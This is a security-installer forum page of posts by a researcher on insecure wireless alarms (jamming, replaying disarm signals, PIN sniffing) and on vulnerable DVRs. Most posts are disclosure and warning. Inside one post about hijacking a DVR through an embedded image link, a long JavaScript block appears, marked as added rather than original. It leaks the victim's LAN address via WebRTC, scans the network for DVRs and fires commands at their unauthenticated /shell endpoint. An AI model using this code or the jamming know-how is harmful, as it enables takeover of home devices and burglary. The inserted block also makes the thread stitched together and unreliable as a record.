Security Installer Community

cybergibbons
Posts posted by cybergibbons

  1. 1 minute ago, AdrianMealing said:

    When you say graded, do you mean independently tested against EN standards or self-certified? Massive difference in my opinion.

     

    TBH, I would prefer self-certified, as it shows that self-certification isn't all it's cracked up to be. Is it possible to tell what has been done?

    To be blunt, I don't understand how some alarms are standards compliant as they just don't seem to detect jamming.

  2. I'd like to properly demonstrate that graded wireless alarms aren't immune to jamming and replay attacks.

     

    In 2012/2013, I found that a Cooper iON alarm could be jammed and replayed, as it uses 1-way RF and the protocol seems pretty legacy.

     

    What other 1-way alarms are on the market?

    Texecom is 2-way, Pyronix is 2-way, HKC is 2-way.

     

     

  3. 11 hours ago, Nova-Security said:

     

    I meant the equipment to capture the signal and turn the alarm off.

     

    My mistake 

     

     

    Ah, ok. I mean, given that the jamming works (and works well), then I think that would be the attack chosen. Only downside to it is that you don't get confirmation the alarm is disarmed, you need to hope for the best.

     

    The replay is awkward as well, as capturing the signal requires you are there when the alarm is armed or disarmed (you can modify one signal to the other easily). That means planning, and the last few "psychology of a burglar" things I have read suggest there is rarely any planning beyond driving round the area beforehand.

  4. 1 hour ago, Nova-Security said:

     

    Can't see it happening for a couple of reasons:

    1) Most Yale alarms are on houses that couldn't afford a proper Grade 2X system; that's why they have purchased a DIY kit.

    2) If you have the equipment needed and the know-how, then you're probably already employed in the IT / electronics field on £30K+, so why would you want to target the people in 1?

    Also, if the Yale alarms are installed DIY and not covered by a maintenance contract from an NSI or SSAIB firm, the insurance company treats the premises as if it hasn't got an alarm (no discounts).

     

    1. It's really not just Yale that have the issue. Anything that isn't 2-way suffers from the issue, including the graded stuff. If you take a look at a number of systems, they aren't 2-way.

    2. The jammers are available from China for £50.

     

  5. 7 hours ago, DCINETRED said:

     

     

    Not all are jammers!

     

    I'm also a radio amateur; 434 MHz is right in the middle of the 70cm amateur band. I run a few amateur repeaters (fully licensed by Ofcom); when they transmit (25 W) they knock out all nearby 434 MHz keyfobs... and by the look of the report, Yale alarms!!

     

    Not all signals you see are jammers, but the boxes the police are recovering are.

     

    25W would be horrific in a built up area for these things. 500mW is already enough!

  6. 9 hours ago, james.wilson said:

    I do think this will become more of an issue, but while insurers see them as the same and are more worried about flood, it won't make a headline.

     

    There's evidence of jammers being used a lot for car theft now, the police are finding them fairly regularly, and a few court cases have had them submitted as evidence. Basic jammers though, just sending a signal all of the time.

    Thing that is puzzling is that, as far as I know, the police haven't recovered any of the gizmos used to get past the more advanced security. Plenty of CCTV footage of thieves walking up to cars and stepping in though.

    9 hours ago, norman said:

    Problem as I see it is, and correct me if I'm wrong, there is no trail of tampering? Much like a bump key: if they lock it after, you're goosed.

     

    Yep. Unfortunately the people who contacted me wanted me to look into it for free, so it was just emails back and forth.

     

    One of them, the problem was that they mentioned to the police the alarm was armed. This got put in the crime report, the insurers didn't believe them...

  7. 18 minutes ago, MrHappy said:

    Ain't there up to 100k in an ATM?

     

    In fact I fancy mending ATMs or traffic lights rather than alarms (no chin rubbing smiley anymore :()

     

    That's about the upper limit, but with a mix of £20s and £10s, normally a lot less. The ones in banks tend to be filled with more.

    Look at these muppets though - spent months digging a tunnel to net a couple of thousand:
    http://www.manchestereveningnews.co.uk/news/greater-manchester-news/mole-gang-dig-100ft-tunnel-679754

  8. 3 hours ago, norman said:

    Because less and less people give a hoot I reckon, and why would a crim go to the trouble of jamming or even capturing a PIN on someone who has a YALE system.

     

    I'd be interested to know the true figures for any radio system circumnavigated in a similar way. 

     

    I also wish I had a pound for every YALE system sold; people buy it through brand trust and recognition.

     

    I dunno, the houses with them on are getting bigger and bigger, and some of the amazon reviews talk of big installs.


    The PIN etc., yeah, not likely. The jamming though, really easy, reliable and cheap. I'd love to say much more expensive alarms can't be jammed, but a fair few can.

    So far in the last 4 years, I've had 8 people approach me about break-ins without alarms going off. One of them I would definitely put down to mental health issues, one was a wired alarm, but the other 6 look credible. Hard to say really.

    Just think manufacturers should all be pulling their weight here, and now stuff is getting Internet connected, even more so. Videofied was terrible, as was Risco.

  9. Last week I presented at IFSEC on the issues with wireless alarms, especially the cheap ones. It was received quite well, but we weren't allowed to name names.

    We've published a blog post about it now:

    https://www.pentestpartners.com/blog/alarm-systems-alarmingly-insecure-oh-the-irony/

     

    The short of it - easy to jam, easy to replay disarm signals, you can sniff the PIN over-the-air if you use a remote keypad, you can brute-force the PIN as well. I reported these issues to Yale 4 years ago.

    However, they seem to be getting more and more popular as time goes on.

  10. We've just published a blog about why these alarms are not great. Stick with graded wireless or wired if possible. If you look on my personal site, you can see what I think of the various systems.

     

    https://www.pentestpartners.com/blog/alarm-systems-alarmingly-insecure-oh-the-irony/

     

    The short of it - easy to jam, easy to replay disarm signals, you can sniff the PIN over-the-air if you use a remote keypad, you can brute-force the PIN as well. I reported these issues to Yale 4 years ago.

  11. From what I've gathered in reading, no home router is safe without an outbound firewall, whether it has a DVR connected or not.

     

    Port forwarding a DVR seems to create a flag for an easy entry route for the automated hackers?

     

    Modern plug-and-play DVRs are just as vulnerable...

     

    HIK DVRs are OK?

     

    Hmm, why tell the customer that you are creating a vulnerability in their network when the network already has a vulnerability with all these automated hacking things from abroad... unless you are port forwarding, which seems old hat and not done much now. Please enlighten.

     

    I can hopefully clarify a bit.

    Your own computer can be used as a pivot as well. It probably would be used as a pivot if you are running XP, with no firewall, no antivirus, out-of-date software, and you didn't care when it started crawling to a halt and the cursor started moving of its own accord.

    That's pretty much what a DVR is: an out-of-date OS, with no firewall, no antivirus, no updates, and you can't actually see what it is doing.

     

    Personally, I would make sure that I wasn't responsible for security issues with the DVR. I don't know the solution though, it's something we are working on in the IT security world. It's way too complex for people to get right at the moment.

    And yes, Hikvision DVRs seem above average. They respond to issues, actually issue firmware updates for most gear, and there is a clear trend showing that they are improving.

  12. If I embed an image link in a web page or email:

    http://192.168.3.101/shell?ps

    And you visit that site, the request will be made to the DVR and it will act on it. I can't see the response, but that doesn't matter.

    So you might have the DVR on another IP. WebRTC will allow me to find your PC's IP. I can then scan the rest of the IPs for the DVR, maybe checking for an image on the login page.

    Then change ps for the reverse shell command. The DVR will then connect to my server and allow me to control it. This would only be stopped by outbound firewalling, which is rare on home and small business networks.
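    The chain in the post above (WebRTC leaks the PC's LAN address, the browser is made to probe the /24 for the DVR's login-page image, then the same image trick delivers the `/shell?` request) written out as an added example. This is not code from the original post or from any DVR vendor. Assumptions not in the post: the DVR login page serves an image at /images/logo.png (a hypothetical path standing in for "an image on the login page"), the victim sits on a /24, and the ICE candidate text is in the standard SDP candidate format. The command is left as a parameter and only `ps` from the post is used; no reverse-shell payload is supplied.

```javascript
// Added example (not from the original forum post). Pure functions so the
// logic runs under Node; the browser-only part (new Image()) is isolated in
// browserImageLoader so it can be swapped for a fake loader when testing.

// Step 1: pull a host IPv4 address out of a WebRTC ICE candidate line, e.g.
//   "candidate:842163049 1 udp 1677729535 192.168.3.22 56789 typ host ..."
// Caveat: current browsers usually replace the address of host candidates
// with an mDNS name (xxxx.local); in that case this returns null.
function localIpFromCandidate(candidate) {
  const m = /candidate:\S+ \d+ \S+ \d+ (\d{1,3}(?:\.\d{1,3}){3}) \d+ typ host/.exec(candidate);
  return m ? m[1] : null;
}

// Step 2: enumerate the other hosts of the /24 the victim's PC is on.
function lanCandidates(localIp) {
  const octets = localIp.split('.').map(Number);
  if (octets.length !== 4 || octets.some(o => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error('not an IPv4 address: ' + localIp);
  }
  const prefix = octets.slice(0, 3).join('.');
  const hosts = [];
  for (let i = 1; i <= 254; i++) {
    if (i !== octets[3]) hosts.push(`${prefix}.${i}`);
  }
  return hosts;
}

// URL builders. /shell?<command> is the form quoted in the post; the logo
// path is a hypothetical marker for "an image on the DVR's login page".
const LOGIN_IMAGE_PATH = '/images/logo.png';
function probeUrl(host) {
  return `http://${host}${LOGIN_IMAGE_PATH}`;
}
function commandUrl(host, command) {
  // Percent-encode so spaces/quotes survive the URL; whether the DVR decodes
  // the query is an assumption, not something the post states.
  return `http://${host}/shell?${encodeURIComponent(command)}`;
}

// Step 3: ask the browser to load the login-page image from every candidate
// host. loadImage(url) resolves true if the image loaded, false otherwise.
async function findDvrHosts(hosts, loadImage, concurrency = 16) {
  const found = [];
  let next = 0;
  async function worker() {
    while (next < hosts.length) {
      const host = hosts[next++];          // synchronous take, safe to share
      if (await loadImage(probeUrl(host))) found.push(host);
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return found.sort();
}

// Browser loader: an <img> fires onload only if the URL returned an image,
// which is how the attacker learns the host exists without reading the body.
function browserImageLoader(timeoutMs = 1500) {
  return url => new Promise(resolve => {
    const img = new Image();
    const timer = setTimeout(() => resolve(false), timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve(true); };
    img.onerror = () => { clearTimeout(timer); resolve(false); };
    img.src = url;
  });
}

// Fake loader for offline use: pretends only the listed hosts serve the
// login image (constructed test data, no network involved).
function fakeLanLoader(dvrHosts) {
  const known = new Set(dvrHosts.map(probeUrl));
  return url => Promise.resolve(known.has(url));
}

// Step 4: the same <img> trick delivers the command. The browser sends the
// GET with the victim's network position, the DVR acts on it, and the
// cross-origin response the attacker cannot read does not matter.
function fireCommand(host, command, loadImage) {
  return loadImage(commandUrl(host, command));
}

// Stand-alone demo with constructed data: victim PC on 192.168.3.22, DVR at
// 192.168.3.101 as in the post.
findDvrHosts(lanCandidates('192.168.3.22'), fakeLanLoader(['192.168.3.101']))
  .then(found => console.log('DVR candidates:', found));
```

    In a browser the loader is `browserImageLoader()` and the candidate line comes from `RTCPeerConnection.onicecandidate`; the mDNS masking mentioned in the comment is the main reason step 1 often yields nothing today, which pushes an attacker back to guessing common private ranges. The defence the post names, outbound firewalling of the DVR, is what stops the final connect-back; the GET itself succeeds because the DVR accepts the request from any browser on the LAN without authentication or a CSRF check.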

  13. Samsung DVRs have known issues:
    https://www.andreafabrizi.it/?exploits:samsung:dvr

    https://www.kb.cert.org/vuls/id/882286

    http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html

     

    I'm about to publish a vulnerability across many of their IP cameras as well.

     

    Hikvision haven't been too bad when reporting vulnerabilities. Their cameras are so-so, still making a lot of mistakes but nothing awful. Not looked at a DVR of theirs.
